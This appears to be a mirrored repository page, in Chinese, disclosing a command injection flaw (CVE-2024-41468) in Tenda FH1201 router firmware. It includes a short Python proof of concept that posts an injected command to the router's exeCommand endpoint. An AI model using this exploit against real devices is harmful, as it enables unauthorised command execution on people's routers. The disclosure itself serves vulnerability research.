admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 22:14:15 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md

27 lines
825 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)
Tenda FH1201 v1.2.0.14存在命令注入漏洞位于exeCommand函数中cmdinput参数未经任何过滤就被复制到栈空间v7中然后执行因此攻击者可以利用该漏洞执行任意命令
固件下载网站https://www.tendacn.com/download/detail-3322.html
![image-20240730214911627](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302149682.png)
## poc
```python
import requests
ip = '192.168.74.145'
url = f"http://{ip}/goform/exeCommand"
data = "cmdinput=ls;"
ret = requests.post(url=url,data=data)
```
![image-20240730214940461](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302149496.png)
## 漏洞来源
- https://github.com/iotresearch/iot-vuln/blob/main/Tenda/FH1201/exeCommand/README.md
Reference in New Issue Copy Permalink